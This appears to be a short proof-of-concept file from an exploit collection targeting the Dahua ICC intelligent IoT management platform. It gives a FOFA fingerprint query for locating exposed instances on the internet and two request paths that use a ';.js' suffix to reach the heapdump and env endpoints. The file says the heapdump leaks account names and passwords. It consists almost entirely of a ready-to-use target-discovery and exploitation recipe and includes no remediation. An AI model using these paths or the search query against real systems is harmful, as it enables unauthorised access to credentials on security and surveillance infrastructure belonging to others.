POC00/大华ICC智能物联综合管理平台heapdump敏感信息泄露.md
2024-07-03 08:57:36 +08:00

20 lines
444 B
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 大华ICC智能物联综合管理平台heapdump敏感信息泄露
大华ICC智能物联综合管理平台heapdump文件敏感信息泄露可以获取账号和密码。
## fofa
```
body="static/fontshd/font-hd.css" || body="客户端会小于800"
```
## poc
```
/evo-apigw/dsc-mac/heapdump;.js
/evo-apigw/dsc-mac/env;.js
```
![image-20240702231803309](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407022318391.png)